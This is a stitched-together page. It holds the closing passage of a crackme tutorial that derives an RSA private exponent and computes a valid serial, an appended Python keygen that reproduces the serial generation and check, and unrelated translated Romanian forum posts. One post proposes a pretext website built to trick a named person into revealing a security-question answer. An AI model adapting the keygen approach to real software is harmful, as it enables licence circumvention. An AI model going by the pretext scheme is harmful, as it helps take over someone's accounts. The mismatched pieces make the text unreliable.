Q = E5109FD956BC44F85A6B0CF071A22DD9

Now click “Calc. D.”

D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57C1

Now that we have our Private Exponent, let’s calculate our valid serial. We know that the encryption formula is:

C = Serial ^ E mod N

And C must be equal to MD5(NAME), which means C = MD5(NAME). So the decryption formula must be:

Serial = C ^ D mod N

Let’s try that out:

NAME = Jamal Chahir
C = MD5(NAME) = 4D945493477571DE563E281CA4145EB9
D = 82CC4CBC47FC65C57814EAEABD128AF6DEB2475AE59DF66F78C90BA1924D57C1
N = 8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D
Serial = C ^ D mod N

The calculation in TiBiNuCa gives us the following result, as you can see below:

20F9C3683546ECDBF4F4469525B1DE915056F81E6708F78B7210858E40D25416

Trying that on the challenge gives us the right message.

Conclusion

In this article, I have shown you how the RSA cryptosystem works and how to reverse it. I hope all of this was clear enough and that you’ve learned something new from it.

Download links:
IDA: https://www.hex-rays.com/products/ida
OllyDBG: OllyDbg v1.10
PEiD: PEiD Download - Softpedia
RSA-Tool: https://tuts4you.com/download.php?view.455
RE-SIGS: https://tuts4you.com/download.php?view.3407
GODUP: https://tuts4you.com/download.php?view.54
TiBiNuCa: https://www.dropbox.com/s/4dipnjrlggrpz1w/TiBiNuCa.rar?dl=0
Target: https://www.dropbox.com/s/4va2kyqyd729hjd/CryptoChallenge1.rar?dl=0

Sources: en.wikipedia.org/wiki/RSA_(cryptosystem)
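The RSA arithmetic that the post above traces through RSA-Tool and TiBiNuCa, reproduced as an added example (this is not code from the post, from the challenge author or from either tool). It takes the constants the post lists (N, E, P, Q), derives D itself with a modular inverse, runs the keygen formula Serial = C ^ D mod N for the name from the post, and then replays the target's own verification path (length rules, then MD5(name) == Serial ^ E mod N) to confirm the result. Assumptions not stated in the post and marked in the code: the serial is emitted in uppercase hex (the post shows it that way), it is left-padded with zeros to 64 digits so the 63/64 length rule is met (padding does not change the value BigIn parses), and "longer than 3 and shorter than 15" is read as 3 < len < 15. The practical lesson for anyone building a licence check is in the last print: a 256-bit modulus factors on a desktop in about an hour, so the scheme's security rests entirely on a key size that was never adequate.

```python
"""RSA arithmetic behind the CryptoChallenge1 check traced in the post.

Added example: uses Python's built-in bignums and hashlib in place of the
target's BigLib and MD5 routines. Constants are the ones listed in the post.
"""
import hashlib

# Public key recovered from the binary and the factors reported by RSA-Tool,
# exactly as the post lists them.
N = int("8640FF9C022F0FB3447F82C6F23CA36703741985A9E35EE670B36B6553926A9D", 16)
E = 0x10001
P = int("960A589F7B9AA6E2FBF05A5F5E507465", 16)
Q = int("E5109FD956BC44F85A6B0CF071A22DD9", 16)


def derive_private_exponent(p: int, q: int, e: int) -> int:
    """Textbook RSA: d = e^-1 mod phi(n), with phi(n) = (p-1)(q-1)."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)  # modular inverse (Python 3.8+)


def name_to_c(name: str) -> int:
    """C = MD5(name) read as a base-16 bignum, as HexEncode + BigIn do in the target."""
    return int(hashlib.md5(name.encode("ascii")).hexdigest(), 16)


def keygen(name: str, d: int, n: int) -> str:
    """Serial = C^d mod n, the inverse of the target's C = Serial^e mod n.

    Assumptions: uppercase hex output, zero-padded to 64 digits so the
    target's 63/64-character rule is satisfied (value is unchanged).
    """
    serial = pow(name_to_c(name), d, n)
    return format(serial, "X").zfill(64)


def target_check(name: str, serial_hex: str, e: int, n: int) -> bool:
    """Mirror of the verification path the post traces.

    The binary compares the two hex strings character by character; comparing
    the integers is equivalent when neither side carries leading zeros.
    Name rule assumed as 3 < len < 15; serial must be 63 or 64 hex digits.
    """
    if not 3 < len(name) < 15:
        return False
    if len(serial_hex) not in (63, 64):
        return False
    try:
        serial = int(serial_hex, 16)  # BigIn with base 16
    except ValueError:
        return False
    return pow(serial, e, n) == name_to_c(name)  # BigPowMod, then the compare loop


if __name__ == "__main__":
    assert P * Q == N, "P and Q must multiply back to the modulus"
    d = derive_private_exponent(P, Q, E)
    name = "Jamal Chahir"
    serial = keygen(name, d, N)
    print("serial for", name, "=", serial)
    print("target accepts it:", target_check(name, serial, E, N))
    # The root weakness: a modulus this small is factored in about an hour.
    print("modulus size:", N.bit_length(), "bits")
```

Running it prints the serial for the post's name and confirms the target-side check accepts it; the same `target_check` can be pointed at any name/serial pair to see exactly which of the traced rules rejects it.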
  19. It wouldn't really be OK. Suppose I'm "selling a site" and haven't managed to sell it within 2 weeks; many posts have piled up already and mine is no longer visible. Right now "UP" is used; if this happened the topic would be left forgotten, plus the guys would get the idea of making accounts for comments. Like: my account is Grigore, I post something, and after 2 weeks I make an account Adrian and post "Is the offer still available?" That would be silly.
  20. How could you find out the hamster's name with the help of a backdoor? He doesn't keep the hamster's name on his PC, and if it's used as a login it has no password:
  21. As was also discussed at https://rstforums.com/forum/94054-legea-securit-ii-cibernetice-votat-de-ale-i-sri-acces-la-calculatoarele-perso.rst <- there is nothing new, nothing has changed and nothing is going to change; this is just a formality... it's just something "official", this has been going on for a long time.
  22. But don't you notice it's just a spam bot?
  23. As @iam60 also said, if he has a hamster, a rabbit, a dog and a cat, how do you know it's the hamster's name? One option would be to ask 3 questions. -Mother's name -What is your favourite animal (among the animals you have) -Your animal's name (here it's still down to luck...) Another option would be something targeted at Viorel's hamster, with the site based on hamsters... as I showed above. And at registration you ask: - What is your hamster's name: - How long have you had it? - What does it like to eat (you can't ask just one question because it would look suspicious)
  24. http://www.000webhost.com/ http://www.freewebhostingarea.com/ http://www.weebly.com/features/#!/free-web-hosting https://byethost.com/free-web-hosting http://5gbfree.com/ http://www.freehostia.com/index2.html http://haphost.com/ https://www.x-o.ro/ https://www.freehosting.com/ The thing is, you want it both free and good; if you don't want to pay, stop being fussy...
  25. Bro, for 25 years (since the revolution) nothing has changed in Romania and it won't change; the schemes are already done behind the "suckers'" backs. Rest assured nobody is going to ask for your opinion or ask you whether "it seems fair to you". Understand that it's the same everywhere (i.e. communism). It's like taking a bottle of Coke and putting a "Pepsi" label on it; the same thing happened with the revolution. Still, let's not get into discussions like this over a news item like that...